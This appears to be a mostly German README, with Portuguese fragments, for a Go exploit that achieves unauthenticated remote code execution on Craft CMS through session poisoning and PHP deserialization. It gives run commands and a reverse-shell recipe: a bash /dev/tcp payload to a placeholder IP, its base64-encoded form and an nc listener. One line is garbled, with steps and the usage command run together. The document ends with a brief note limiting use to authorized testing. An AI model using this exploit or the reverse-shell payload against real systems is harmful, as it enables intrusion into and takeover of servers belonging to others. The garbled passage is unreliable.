
Pre-auth RCE exploit for Craft CMS in Go. Grabs session/CSRF token, poisons PHP session, triggers deserialization for command execution or reverse shell. Pre-Auth-RCE-Exploit für Craft CMS in Go. Holt sich Session-/CSRF-Token, vergiftet die PHP-Session, löst Deserialisierung zur Befehlsausführung oder für eine Reverse Shell aus.
Exploit für die Ausführung von Remote-Code ohne Authentifizierung im Craft CMS, geschrieben in Go.
Inspiriert von der ursprünglichen Arbeit von c0gnit00.
GET /admin/login abassets/generate-transform aus, um die vergiftete Datei einzubinden und auszuführengo run main.go -u <url> -c <comando>
| Flag | Beschreibung | Erforderlich |
|---|---|---|
-u | Ziel-URL (z. B. http://target.com) | Ja |
-c | Auszuführender Befehl (z. B. id, whoami) | Ja |
# Sem Asset ID (brute-force automático)
go run main.go -u http://target.com -c whoami
1. Generieren Sie den Payload in Base64 mit Ihrer IP und Ihrem Port:
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64
2. Öffnen Sie den Listener:
nc -lvnp 4444
3. Führen Sie den Exploit mit dem Payload aus:
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"
Ersetzen Sie den Base64-Wert durch den in Schritt 1 mit Ihrer echten IP generierten Wert.
Zur ausschließlichen Verwendung in autorisierten Umgebungen und kontrollierten Sicherheitstests.